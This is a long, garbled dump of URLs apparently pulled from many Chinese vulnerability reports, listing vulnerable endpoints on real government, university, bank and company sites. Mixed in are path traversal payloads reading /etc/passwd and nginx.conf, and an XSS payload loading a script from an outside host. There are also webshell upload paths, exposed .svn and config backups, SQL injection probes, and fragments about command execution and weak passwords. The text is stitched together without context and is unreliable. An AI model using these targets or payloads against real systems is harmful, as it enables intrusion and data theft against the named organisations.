http://218.11.132.158:8081/finance_hbcd//monitor/szgk_form2.jsp?village_dm=0106010 http://218.56.132.248:8082/finance_lysyn//monitor/szgk_form2.jsp?village_dm=0106010 http://218.56.40.229:8037//newsymItemView/Item2.aspx?id=021973 http://123.134.189.60:8022//newsymItemView/Item2.aspx?id=021973 http://222.135.109.70:8200//newsymItemView/Item2.aspx?id=021973 http://218.56.99.84:8003//newsymItemView/Item2.aspx?id=021973 http://jwh.tanljgzx.gov.cn/newsymItemView/Item2.aspx?id=021973 http://218.206.191.22/prm/ http://218.206.191.22/prm/authprm/accountManage/accountRegOAgainDraft.jsp?accountId=0000015211 http://218.206.191.22/prm_server/attachment!download.action?attachFileId=200100196559&domain=sp http://git.tongbanjie.com后台弱口令导致的 www.haohaizi.com http://**.**.**/Public/login/ http://tcm.iquanyou.com.cn/tcm/login.jsp http://dabao.muzhiwan.com/.svn/entries http://club.591hx.com/index_on1.aspx https://mail.sgcc.com.cn/webmail/login/login.do 
http://remotebak.abchinalife.cn:7060/ui/common/easyQueryVer3/EasyQueryXML.jsp时,会跳转到http://remotebak.abchinalife.cn:7060/ui/indexlis.jsp让我误以为程序已经做了权限控制。 http://remotebak.abchinalife.cn:7060/ui/common/easyQueryVer3/EasyQueryXML.jsp http://remotebak.abchinalife.cn:7060/ui/indexlis.jsp http://www.1more.com/min?f=../../../../../../../../../../etc/nginx/nginx.conf%00.js http://360class.cn/ http://360class.cn/vip_center.html http://12580wap.10086.cn/wap5/user!q.do https://ibs.bjrcb.com/per/login.do https://emkei.cz/ http://mail.smartisan.com http://ms.jd.com/easy/quick/new.html http://url/adminconfig/admin/add_admin.php http://222.170.47.226:8888 http://ayibang.com/appointment/detail?city=%E5%8C%97%E4%BA%AC&keyword=../../../../../../../../../../etc/passwd%00.jpg http://223.6.253.93/public/Public/login http://uctest.ucweb.com:81/wml/Graphics/Showpic/showpic.php?subdir=../ http://admin.mafengwo.cn/ http://oa.11777711.com/login.php http://**.**.**/kpi/login.jsp http://ms.jd.com/easy/quick/new.html这个地方 http://oa.sdufe.edu.cn/set_book.php?online=1 https://vpn.sdufe.edu.cn/por/service.csp?rnd=lmgjiilfibhgggbd http://60.191.222.254/ http://dgdz.xzit.edu.cn/model/TwoGradePage/OurCourse.aspx?columnId=272 http://sys.zafu.edu.cn:81//model/TwoGradePage/OurCourse.aspx?columnId=272 http://hzhlab.hytc.edu.cn/model/TwoGradePage/OurCourse.aspx?columnId=272 http://182.129.150.10:8001/model/TwoGradePage/OurCourse.aspx?columnId=272 http://labch.cumt.edu.cn:81/model/TwoGradePage/OurCourse.aspx?columnId=272 http://dgdz.xzit.edu.cn/model/TwoGradePage/yuyuelist.aspx?columnId=249 http://sys.zafu.edu.cn:81/model/TwoGradePage/yuyuelist.aspx?columnId=249 http://hzhlab.hytc.edu.cn/model/TwoGradePage/yuyuelist.aspx?columnId=249 http://182.129.150.10:8001/model/TwoGradePage/yuyuelist.aspx?columnId=249 http://labch.cumt.edu.cn:81/model/TwoGradePage/yuyuelist.aspx?columnId=249 http://dgdz.xzit.edu.cn/model/TwoGradePage/experiment.aspx?columnId=258 
http://sys.zafu.edu.cn:81/model/TwoGradePage/experiment.aspx?columnId=258 http://hzhlab.hytc.edu.cn/model/TwoGradePage/experiment.aspx?columnId=258 http://182.129.150.10:8001/model/TwoGradePage/experiment.aspx?columnId=258 http://labch.cumt.edu.cn:81/model/TwoGradePage/experiment.aspx?columnId=258 http://ycjg.jsfda.gov.cn/openfireweb/ http://ycjg.jsfda.gov.cn/openfireweb/ShowEnterpUploadRecordInvoic1.action http://ycjg.jsfda.gov.cn/openfireweb/ShowEnterpUploadRecordInvoic1.action http://console.just.edu.cn/ http://www.mayi.com/landlord/850351493/order/850030576 http://www.mayi.com/landlord/850351493/order/850340576 http://platform.51fenqi.com/enter/login http://wooyun.org/bugs/wooyun-2010-082279 http://www.scyahyez.com/SRP2003/UserManage/sysuser/modifypage.asp?id=1 http://jwculture.com/SRP2003/UserManage/sysuser/modifypage.asp?id=1 http://www.lcxyz.com:21245/SRP2003/UserManage/sysuser/modifypage.asp?id=1 http://183.167.250.28:85/SRP2003/UserManage/sysuser/modifypage.asp?id=1 http://www.suyaxing.com:81/SRP2003/UserManage/sysuser/modifypage.asp?id=1 http://jwmis.dzvtc.edu.cn//web/web/kebiao/kebiao.asp http://www.cdtlgcxx.com:2110/web/web/kebiao/kebiao.asp http://jw.sxjgxy.edu.cn/web/web/kebiao/kebiao.asp http://score.xaau.edu.cn/web/web/kebiao/kebiao.asp http://jw.cduestc.cn/web/web/kebiao/kebiao.asp http://223.67.133.9:81/syxdzts/gl_pl_1.asp http://lsxnmxx.js.cn:41516/tushu/gl_pl_1.asp http://112.4.228.169:880/gl_pl_1.asp http://ebook.lygfls.com/gl_pl_1.asp http://www.hssqjy.com/dzts/gl_pl_1.asp http://www.gyxsqex.com/tushu/gl_pl_1.asp http://www.dhtfxx.com/tushu/gl_pl_1.asp http://223.67.133.9:81/syxdzts/gl_pl_1.asp http://223.67.133.9:81/syxdzts/gl_pl_shen.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_pl_shen.asp?id= http://112.4.228.169:880/gl_pl_shen.asp?id= http://ebook.lygfls.com/gl_pl_shen.asp?id= http://www.hssqjy.com/dzts/gl_pl_shen.asp?id= http://www.gyxsqex.com/tushu/gl_pl_shen.asp?id= http://www.dhtfxx.com/tushu/gl_pl_shen.asp?id= 
http://www.dhtfxx.com/tushu/gl_pl_shen.asp?id= http://223.67.133.9:81/syxdzts/gl_pl_shan.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_pl_shan.asp?id= http://112.4.228.169:880/gl_pl_shan.asp?id= http://ebook.lygfls.com/gl_pl_shan.asp?id= http://www.hssqjy.com/dzts/gl_pl_shan.asp?id= http://www.gyxsqex.com/tushu/gl_pl_shan.asp?id= http://www.dhtfxx.com/tushu/gl_pl_shan.asp?id= http://www.dhtfxx.com/tushu/gl_pl_shan.asp?id= http://xxfw.tjciq.gov.cn/portal/portalInit.action?method=findAll存在struts2命令执行漏洞 http://cps.g2.cn/index.php http://opm.g2.cn/ http://61.191.199.33/ http://218.108.129.77:8080/华数无线运营中心 http://218.108.129.133:8888/ http://218.108.129.135:8080/demo_main.do http://60.209.248.228/jeeadmin/jeecms/index.do http://wm.shqgy.com.cn/aspx.aspx http://fangvip.ganji.com/hr_v2/?c=auth&a=loginOut http://console.jhun.edu.cn/login http://gra.guet.edu.cn/,于是乎,找到了搜索框注入, http://gra.guet.edu.cn/search.aspx?Category=all&keywords=1 http://login.unipus.cn/register.php http://familymart.kembo88.com/ http://wechat.kembo88.com/ http://familymart.kembo88.com/api/v1/admin_is_login http://wechat.kembo88.com/api/admin_is_login http://wechat.kembo88.com/api/configs http://www.incopat.com/login/tologin.action http://it.zotye.com:88/user_initLogin.action http://oa.zotye.com/main/login.jsp http://www.timber2005.com/Product_sy.html http://px2.timber2005.com/Webpage/Search.aspx?select=a http://192.168.0.113:8080/?action=Auth&authcode=111111&t=1434349686078 http://211.90.241.58/WebApp/emoss//files/login/login.jsp http://211.90.241.58/WebApp/emoss//files/ http://vip.veryeast.cn/system/micro http://m.veryeast.cn/micro/site/index?c_userid=2277338 http://lms2.9first.com/register/company?name=%E8%80%81%E5%88%98&contacts=%3Cimg%20src=x%20onerror=s=createElement%28%27script%27%29;body.appendChild%28s%29;s.src=%27http://xiix.ml/sOg9ag%27;%3E&contacts_mobile=13015648625 http://sss.qq.com/web.sql http://eye.gome.com.cn/ http://www.piaoyou.org/case_web.htm http://www.h-h.com.cn www.h-h.com.cn 
http://www.timber2005.com/Product_sy.html http://px2.timber2005.com/Webpage/Qa_content.aspx?info=4124 comm.tongji.edu.cn/admin/Login.asp comm.tongji.edu.cn/Ch/kyview.asp?ID=21 jpkc.tongji.edu.cn/jpkc/hltjgjbyl/admin/login.asp jpkc.tongji.edu.cn/jpkc/hltjgjbyl/teacherinfo.asp?id=8 agri.tongji.edu.cn/Search.aspx?search= cs.tongji.edu.cn/administrator/index.php cs.tongji.edu.cn/index.php?format=feed&type=rss http://yun.btvtech.com/tpp/rest/login.html;JSESSIONID=2dc18ff99da48dee7c9ef2017171f9ed http://yun.btvtech.com/tpp/rest/o/download.json?filepath=http://27.112.87.228:80/Y:/体育FTP素材入线索库/Low/2015-06-01/010615050-shara-post-uncut-1_14331653191.mp4 http://27.112.87.228:80 http://27.112.87.228/C:/Windows/system.ini http://www.tvmcloud.com/Home/Index/index http://cloud.btvtech.com/search.htm http://video.wanfangdata.com.cn/manage/ http://aqe.wyn88.com/Quickas/ http://aqe.wyn88.com/Quickas/privilege/account.jsp http://211.150.77.29/common/activeX/activeX.php http://211.150.77.29/common/web_meeting/ http://webmeet.263.net mat.tongji.edu.cn/bbs http://mat.tongji.edu.cn/bbs/mymodify.asp http://mat.tongji.edu.cn/bbs/UploadFace/2015-5/cun.asp http://blog.ifeng.com/crossdomain.xml http://mypic.ifeng.com/upload/upload/2015/06/15/f2c667ac4357371d1434358956.jpg?1434358956 http://pan.baidu.com/s/1bn766x5 http://prc.ifeng.com/playRecord/getList?username=jearyxxx&sid=此处改为你自己的sid&start=0&limit=20&callback= http://tuitui.7po.com/.svn/entries http://www.unimeeting.cn/) http://schedule.unimeeting.cn) http://idg.unimeeting.cn/) http://60.12.233.59:80/ https://www.sidatz.com/images/head.jpg/1.php http://bbs.sidatz.com/template/comiis_x25jymf/css/comiis/logo.png/.php http://bbs.sidatz.com/data/attachment/forum/201506/15/18285071y33k31327u53vf.gif/.php txt:http://bbs.sidatz.com/1.txt https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf上说的很详细了。 
http://www.test.com/?q=xss1&q=xss2,不同的WEB服务器处理的方式不一样,个人感觉http://blog.csdn.net/eatmilkboy/article/details/6761407中google和yahoo的例子已经将HPP的原理讲得很清楚了。 http://blog.csdn.net/eatmilkboy/article/details/6761407中提到的刷票) http://xue.jd.com/ondemandCourse/queryOndemandCoursePage.action?classifyId=&courseLable=%25E6%258E%25A8%25E5%25B9%25BF&courseName=123&courseName=1234&flag=1 http://union.lashou.com/index.php?r=my/my/view&id=message&message_id=1 http://www.gx1996.com/forget_password.action http://www.dpex.com.tw/log.asp ttp://221.224.50.46/ http://jy.4000211929.com/ http://61.129.251.198:81/ http://demo.piaoyou.org/ http://61.129.251.198:88/ http://58.246.26.230:81/ http://122.227.255.94:81/ http://180.166.101.94:81/ http://222.128.120.192:81/ http://oa.zhongbo-china.com/ http://oa.jl-travel.com/ http://oa.dxtravel.cn http://cz.4000211929.com http://hy.4000211929.com/ www.yeehang.cc/ http://zhuaqu.blog.caijing.com.cn/.svn/entries http://111.1.15.92:8080/imc/login.jsf?reloginFlag=true http://www.lvgou.com/ http://redlantern.thehanshow.com/website/admin.php http://redlantern.thehanshow.com/website/admin.php?mod=opus&check=1&nowpage=3 www.test.sfn.com.cn http://www.test.sfn.com.cn/index.php/trends/li/1?c_id=4 ttp://221.224.50.46/ http://jy.4000211929.com/ http://61.129.251.198:81/ http://demo.piaoyou.org/ http://61.129.251.198:88/ http://58.246.26.230:81/ http://122.227.255.94:81/ http://180.166.101.94:81/ http://222.128.120.192:81/ http://oa.zhongbo-china.com/ http://oa.jl-travel.com/ http://oa.dxtravel.cn http://cz.4000211929.com http://hy.4000211929.com/ www.yeehang.cc/ http://demo.piaoyou.org/bx/base.aspx?gysid=39&gysname=%u592a%u5e73%u6d0b&id=2%27&m=8 http://demo.piaoyou.org/flight/kaipiao_edit.aspx?id=937 http://demo.piaoyou.org/flight/refund_update.aspx?id=942&sid=438 http://shuangyashan.hljjt.gov.cn:80/module/jslib/jquery/jpage/dataproxy.jsp?unitid=1 
http://www.lishixueyuan.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://www.jljl.lss.gov.cn/bgxz.asp?kind=all http://www.ci123.com/yun/daily.php?d=1&w=1 http://www.phxad.com.cn:80/login.asp https://kaihu.gyzq.com/ kaihu.gyzq.com//Jzkh_photos/img/ http://mingshi.wanfangdata.com.cn/Personal/ScholarResponse.aspx http://www.ijie.com/ http://pt2013.ijie.com/ http://61.177.144.186/config.php.bak http://61.177.144.188/config.php.bak inurl:NewsSystem/shownews.aspx?newsid http://bbs.cnfish.com/uc_server/data/config.inc.php.bak http://www.dfgjj.dfmc.com.cn/ShowNews.aspx?Id=1344 http://www.dfgjj.dfmc.com.cn/ShowNews.aspx?Id=126 http://www.zh171.com/admin/login.aspx http://www.kfpolice.com/zdzxx/admin/mail/maillist.aspx http://www.kfpolice.com/zdzxx/ http://www.metadata.com.cn/cpjs1.asp?ProID=42 http://210.33.44.5:8080/docinfo?docid=302&dbid=2&dbname=%E5%AD%A6%E4%BD%8D%E8%AE%BA%E6%96%87%E5%BA%93 http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://www.zgstats.gov.cn/ListNews.php?cid=120 http://www.zgstats.gov.cn/admin/login.php http://www.zdlife.net http://chaoshi.zdlife.net/password http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://demo.piaoyou.org http://202.102.72.109:8080/gimis/login.action存在命令执行漏洞 http://www.acgf.org.tw/app/loginchk.asp https://mail.pingxx.com/ http://113.105.64.214:8080/help/help_content.shtml?compid=TEMPUS&p=lectureMenu http://**.**.**/pgps/ http://**.**.**/pgps/system/loginAction_execute.action;jsessionid=5E6082C7F26670DC80DB2A7A8FEFA078 http://file.cits.cn/online/images/cits_logo.ico http://file1.cits.cn/online/images/cits_logo.ico http://file1.cits.cn/css/b2c/common/??layout.css?v=1.0.1 
http://file.cits.cn/js/b2c/jquery/??jquery-1.11.2.min.js,jquery.SuperSlide.2.1.js,jquery.jqtransform.js,jquery.DOMWindow.js,jquery.cookie.js,jquery.autocomplete.js,jquery.artDialog.js,jquery.lazyload.min.js?v=1.0.1 http://cfl.shmtu.edu.cn/tzgg_show.aspx?id=313 http://sqlmap.org http://www.vcyber.com/manager/getpositionlist http://www.vcyber.com/Admin/Adminlogin http://www.vcyber.com/UploadFile/2015-6-16-5-42-55-m.aspx http://220.194.62.66/login.jsp http://220.194.62.66/console/login/LoginForm.jsp http://www.lwaj.gov.cn/list.jsp?col=10 http://www.sxz.edu.cn/darkston.jsp http://ztc.120.net/ http://hexin.fudan.edu.cn/index.php,找了几个URL实验名没有什么结果,偶然打开首页某框架URL: http://hexin.fudan.edu.cn/coursetype.php?type=5&term=4 http://hexin.fudan.edu.cn/coursetype.php?type=6-1&term=4 http://hexin.fudan.edu.cn/coursetype.php?type=5%27&term=4 http://hexin.fudan.edu.cn/coursetype.php?type=5&term=4 http://hexin.fudan.edu.cn/coursetype.php?type=5&term=4 http://www.dzfgj.com/list.aspx?tn=%E6%9C%BA%E6%9E%84%E8%AE%BE%E7%BD%AE http://180.153.29.44/phpmyadmin/index.php http://cs.yuncheng.com:80/.svn/entries http://gys.cvte.cn/wp-admin/.svn/entries http://gys.cvte.cn/wp-content/.svn/entries www.to8to.com/my/yezhu_management.php?act=update_data&aid=1826 http://cgs.ycga.gov.cn/ http://www.asp168.com/default.php?mod=c&s=ss0149a5b http://jifen.xunlei.com/jifen/exchange/group/0/type/2/searchName/1%25 http://218.78.217.68/yyoa/index.jsp http://123.56.90.28/main https://selcrs.nsysu.edu.tw/newstu/STU_NEW.ASP?ACTION=16 http://chaoshi.zdlife.net/streetDetail?id=ff8080814a7f4c49014a846c5a0316cf&cur=1 http://chaoshi.zdlife.net/street?cur=1&x=2&t=ff8080814a285e2f014a28c3f5260183 http://dxll.csairholiday.com/ www.sjzipo.gov.cn/admin/,通过弱口令admin http://www.ks2y.com/cms/LD.aspx?LMID=23 http://www.zchospital.com/cms/LD.aspx?LMID=23 http://www.zjcc.org.cn:8000//cms/LD.aspx?LMID=23 http://www.ksskfyy.com//cms/LD.aspx?LMID=23 http://www.zjqhyy.com/cms/LD.aspx?LMID=11 http://ywzxyy.com/cms/LD.aspx?LMID=12 
http://baike.anjuke.com/index.php http://kankan.baidu.com/Play/live/20afcfc717eb44f03c288018ff70332a/476057949/1/a=0/offset http://kankan.baidu.com/Play/live/9b29a20cb75a1473fbcc39857d9dcd38/476057949/1/a=0/offset http://www.xensystem.test.com/?vi=后面的数字ID,你将看到惊人的一幕: http://b.cart.suning.com/largePurchase.do http://www.vpclub.cn/log.txt http://www.vpclub.cn/info.php http://hpmanagern.fang.com/.svn/entries http://jxt.hi165.com/index2/index.jsp http://s.haier.com/sr/ajax/getJirSassIcon.jsp?surveyid= http://221.193.216.78/cgs/myweb/w_ShowNew.aspx?xh=20121220090749312 http://union.lashou.com/index.php?r=setting/bank/index http://union.lashou.com/?r=setting/bank/dynamiccities http://ir.anta.com/sc/home.php?id=4&Itemid=3&option=3&year=* http://ir.anta.com/tc/home.php?id=4&Itemid=3&option=3&year=* http://61.138.243.15:81/index.aspx http://id.371.cn/ com.xywy.ask/com.xywy.ask.activity.MyPlusDetailActivity;end http://www.ektianxia.cn/ http://webschool.xgrsks.cn/CaiStudy1.aspx?cls_no=000001&cai_no=KJ000004 http://testa.ektianxia.com/CaiStudy1.aspx?cls_no=000001&cai_no=KJ000012 http://110.249.254.157:10001/CaiStudy1.aspx?cls_no=000001&cai_no=KJ000014 http://test6.ektianxia.com/CaiStudy1.aspx?cls_no=000001&cai_no=KJ000004 http://peixun.hnedu.cn/CaiStudy1.aspx?cls_no=000001&cai_no=KJ000001 http://test2.ektianxia.com/CaiStudy1.aspx?cls_no=000001&cai_no=KJ000055 http://www.bctb.gov.cn:80/news/read.asp?id=1306 http://www.BCTB.gov.cn:80/news/read.asp?id=1306 http://www.BCTB.gov.cn:80/news/read.asp?id=1306 http://www.bctb.gov.cn:80/news/read.asp?id=1306 http://**.**.**.**/bugs/wooyun-2015-0103334另一处 inurl:8080/rcc/ http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 
http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://www.wooyun.org/whitehats/北京方便面 http://www.yiqifa.com:8888/ http://fed.lvmama.com/wp-login.php http://edu.irongke.com/Admin/Policy/PolicyDownload.aspx?PolicyId=7 http://www.monelostar.com/ks/Admin/Policy/PolicyDownload.aspx?PolicyId=13 http://test2.ektianxia.com/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://peixun.yiling.cn:8081/Admin/Policy/PolicyDownload.aspx?PolicyId=7 http://webschool.xgrsks.cn//Admin/Policy/PolicyDownload.aspx?PolicyId=7 http://110.249.254.157:10001//Admin/Policy/PolicyDownload.aspx?PolicyId=7 http://peixun.hnedu.cn/Admin/Policy/PolicyDownload.aspx?PolicyId=7 http://222.191.250.100:81/ http://f.72dns.com/test.aspx http://www.zendaimoney.com/spenewslist.php?typeid=10 http://www.zendaimoney.com/spenewsDetail.php?id=14 http://www.zendaimoney.com/spenewslist.php?typeid=10 
http://223.67.133.9:81/syxdzts/gl_shan.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_shan.asp?id= http://112.4.228.169:880/gl_shan.asp?id= http://ebook.lygfls.com/gl_shan.asp?id= http://www.hssqjy.com/dzts/gl_shan.asp?id= http://www.gyxsqex.com/tushu/gl_shan.asp?id= http://www.dhtfxx.com/tushu/gl_shan.asp?id= http://223.67.133.9:81/syxdzts/gl_tj_0.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_tj_0.asp?id= http://112.4.228.169:880/gl_tj_0.asp?id= http://ebook.lygfls.com/gl_tj_0.asp?id= http://www.hssqjy.com/dzts/gl_tj_0.asp?id= http://www.gyxsqex.com/tushu/gl_tj_0.asp?id= http://www.dhtfxx.com/tushu/gl_tj_0.asp?id= http://223.67.133.9:81/syxdzts/gl_tj_1.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_tj_1.asp?id= http://112.4.228.169:880/gl_tj_1.asp?id= http://ebook.lygfls.com/gl_tj_1.asp?id= http://www.hssqjy.com/dzts/gl_tj_1.asp?id= http://www.gyxsqex.com/tushu/gl_tj_1.asp?id= http://www.dhtfxx.com/tushu/gl_tj_1.asp?id= http://223.67.133.9:81/syxdzts/gl_tj_2.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_tj_2.asp?id= http://112.4.228.169:880/gl_tj_2.asp?id= http://ebook.lygfls.com/gl_tj_2.asp?id= http://www.hssqjy.com/dzts/gl_tj_2.asp?id= http://www.gyxsqex.com/tushu/gl_tj_2.asp?id= http://www.dhtfxx.com/tushu/gl_tj_2.asp?id= http://223.67.133.9:81/syxdzts/gl_tuijian_1.asp http://lsxnmxx.js.cn:41516/tushu/gl_tuijian_1.asp http://112.4.228.169:880/gl_tuijian_1.asp http://ebook.lygfls.com/gl_tuijian_1.asp http://www.hssqjy.com/dzts/gl_tuijian_1.asp http://www.gyxsqex.com/tushu/gl_tuijian_1.asp http://www.dhtfxx.com/tushu/gl_tuijian_1.asp http://223.67.133.9:81/syxdzts/gl_tz_add2.asp http://lsxnmxx.js.cn:41516/tushu/gl_tz_add2.asp http://112.4.228.169:880/gl_tz_add2.asp http://ebook.lygfls.com/gl_tz_add2.asp http://www.hssqjy.com/dzts/gl_tz_add2.asp http://www.gyxsqex.com/tushu/gl_tz_add2.asp http://www.dhtfxx.com/tushu/gl_tz_add2.asp http://223.67.133.9:81/syxdzts/gl_tz_shan.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_tz_shan.asp?id= http://112.4.228.169:880/gl_tz_shan.asp?id= 
http://ebook.lygfls.com/gl_tz_shan.asp?id= http://www.hssqjy.com/dzts/gl_tz_shan.asp?id= http://www.gyxsqex.com/tushu/gl_tz_shan.asp?id= http://www.dhtfxx.com/tushu/gl_tz_shan.asp?id= http://223.67.133.9:81/syxdzts/gl_tz_she.asp?zt=1&id=1 http://lsxnmxx.js.cn:41516/tushu/gl_tz_she.asp?zt=1&id=1 http://112.4.228.169:880/gl_tz_she.asp?zt=1&id=1 http://ebook.lygfls.com/gl_tz_she.asp?zt=1&id=1 http://www.hssqjy.com/dzts/gl_tz_she.asp?zt=1&id=1 http://www.gyxsqex.com/tushu/gl_tz_she.asp?zt=1&id=1 http://www.dhtfxx.com/tushu/gl_tz_she.asp?zt=1&id=1 http://223.67.133.9:81/syxdzts/gl_tz_xian.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_tz_xian.asp?id= http://112.4.228.169:880/gl_tz_xian.asp?id= http://ebook.lygfls.com/gl_tz_xian.asp?id= http://www.hssqjy.com/dzts/gl_tz_xian.asp?id= http://www.gyxsqex.com/tushu/gl_tz_xian.asp?id= http://www.dhtfxx.com/tushu/gl_tz_xian.asp?id= http://223.67.133.9:81/syxdzts/gl_us_shan.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_us_shan.asp?id= http://112.4.228.169:880/gl_us_shan.asp?id= http://ebook.lygfls.com/gl_us_shan.asp?id= http://www.hssqjy.com/dzts/gl_us_shan.asp?id= http://www.gyxsqex.com/tushu/gl_us_shan.asp?id= http://www.dhtfxx.com/tushu/gl_us_shan.asp?id= http://223.67.133.9:81/syxdzts/gl_xiu.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_xiu.asp?id= http://112.4.228.169:880/gl_xiu.asp?id= http://ebook.lygfls.com/gl_xiu.asp?id= http://www.hssqjy.com/dzts/gl_xiu.asp?id= http://www.gyxsqex.com/tushu/gl_xiu.asp?id= http://www.dhtfxx.com/tushu/gl_xiu.asp?id= http://223.67.133.9:81/syxdzts/gl_xiu2.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_xiu2.asp?id= http://112.4.228.169:880/gl_xiu2.asp?id= http://ebook.lygfls.com/gl_xiu2.asp?id= http://www.hssqjy.com/dzts/gl_xiu2.asp?id= http://www.gyxsqex.com/tushu/gl_xiu2.asp?id= http://www.dhtfxx.com/tushu/gl_xiu2.asp?id= http://223.67.133.9:81/syxdzts/guanli2.asp http://lsxnmxx.js.cn:41516/tushu/guanli2.asp http://112.4.228.169:880/guanli2.asp http://ebook.lygfls.com/guanli2.asp 
http://www.hssqjy.com/dzts/guanli2.asp http://www.gyxsqex.com/tushu/guanli2.asp http://www.dhtfxx.com/tushu/guanli2.asp http://223.67.133.9:81/syxdzts/default.asp http://lsxnmxx.js.cn:41516/tushu/default.asp http://112.4.228.169:880/default.asp http://ebook.lygfls.com/default.asp http://www.hssqjy.com/dzts/default.asp http://www.gyxsqex.com/tushu/default.asp http://www.dhtfxx.com/tushu/default.asp http://223.67.133.9:81/syxdzts/mafen.asp?shuxing=1 http://lsxnmxx.js.cn:41516/tushu/mafen.asp?shuxing=1 http://112.4.228.169:880/mafen.asp?shuxing=1 http://ebook.lygfls.com/mafen.asp?shuxing=1 http://www.hssqjy.com/dzts/mafen.asp?shuxing=1 http://www.gyxsqex.com/tushu/mafen.asp?shuxing=1 http://www.dhtfxx.com/tushu/mafen.asp?shuxing=1 http://223.67.133.9:81/syxdzts/mafen2.asp?shuxing=1 http://lsxnmxx.js.cn:41516/tushu/mafen2.asp?shuxing=1 http://112.4.228.169:880/mafen2.asp?shuxing=1 http://ebook.lygfls.com/mafen2.asp?shuxing=1 http://www.hssqjy.com/dzts/mafen2.asp?shuxing=1 http://www.gyxsqex.com/tushu/mafen2.asp?shuxing=1 http://www.dhtfxx.com/tushu/mafen2.asp?shuxing=1 http://223.67.133.9:81/syxdzts/ping_cha.asp?mingcheng=1 http://lsxnmxx.js.cn:41516/tushu/ping_cha.asp?mingcheng=1 http://112.4.228.169:880/ping_cha.asp?mingcheng=1 http://ebook.lygfls.com/ping_cha.asp?mingcheng=1 http://www.hssqjy.com/dzts/ping_cha.asp?mingcheng=1 http://www.gyxsqex.com/tushu/ping_cha.asp?mingcheng=1 http://www.dhtfxx.com/tushu/ping_cha.asp?mingcheng=1 http://223.67.133.9:81/syxdzts/ping_hao.asp?mingcheng=1 http://lsxnmxx.js.cn:41516/tushu/ping_hao.asp?mingcheng=1 http://112.4.228.169:880/ping_hao.asp?mingcheng=1 http://ebook.lygfls.com/ping_hao.asp?mingcheng=1 http://www.hssqjy.com/dzts/ping_hao.asp?mingcheng=1 http://www.gyxsqex.com/tushu/ping_hao.asp?mingcheng=1 http://www.dhtfxx.com/tushu/ping_hao.asp?mingcheng=1 http://223.67.133.9:81/syxdzts/pl_add.asp?id= http://lsxnmxx.js.cn:41516/tushu/pl_add.asp?id= http://112.4.228.169:880/syxdzts/pl_add.asp?id= 
http://ebook.lygfls.com/syxdzts/pl_add.asp?id= http://www.hssqjy.com/dzts/pl_add.asp?id= http://www.gyxsqex.com/tushu/pl_add.asp?id= http://www.dhtfxx.com/tushu/pl_add.asp?id= http://223.67.133.9:81/syxdzts/search.asp?keywords=1&shuxing=1 http://lsxnmxx.js.cn:41516/tushu/search.asp?keywords=1&shuxing=1 http://112.4.228.169:880/syxdzts/search.asp?keywords=1&shuxing=1 http://ebook.lygfls.com/syxdzts/search.asp?keywords=1&shuxing=1 http://www.hssqjy.com/dzts/search.asp?keywords=1&shuxing=1 http://www.gyxsqex.com/tushu/search.asp?keywords=1&shuxing=1 http://www.dhtfxx.com/tushu/search.asp?keywords=1&shuxing=1 http://www.dhtfxx.com/tushu/search.asp?keywords=1&shuxing=1 http://223.67.133.9:81/syxdzts/pl_add.asp?id= http://202.100.81.114:8080/bdcp/newlogin.jsp http://you.ctrip.com/membersite/ajax/addfriend.ashx http://www.xiangguo.com http://www.to8to.com/my/ask.php?status=2 http://m.trip.cmbchina.com/commbusiness-visa/orderSuccess.action?tradeId=200000 http://m.trip.cmbchina.com/commbusiness-visa/orderSuccess.action?tradeId=807000 site:m.ly.com http://120.27.42.238:8080/ http://120.27.42.238:8080/job/zader/com.liubo$zader/ws/src/main/webapp/bha-index.html/*view*/ http://dgdz.xzit.edu.cn/model/TwoGradePage/jifenbz.aspx?columnId=271 